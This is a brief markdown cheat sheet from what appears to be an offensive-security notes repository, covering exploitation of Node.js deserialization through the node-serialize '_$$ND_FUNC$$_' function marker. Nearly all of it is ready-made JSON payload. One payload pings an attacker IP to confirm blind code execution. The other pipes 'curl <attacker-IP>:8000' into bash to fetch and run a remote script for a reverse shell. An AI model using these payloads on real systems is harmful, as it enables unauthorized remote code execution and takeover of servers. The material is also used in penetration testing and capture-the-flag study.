killchain-compendium/Exploits/Web/Node.js Deserialization.md

541 B

De/Serialization

  • _$$ND_FUNC$$_function (){} is executed after parsing

Example Payloads

  • Encode, send and wait with sudo tcpdump -i <interface> icmp
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

Reverse shell via

{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}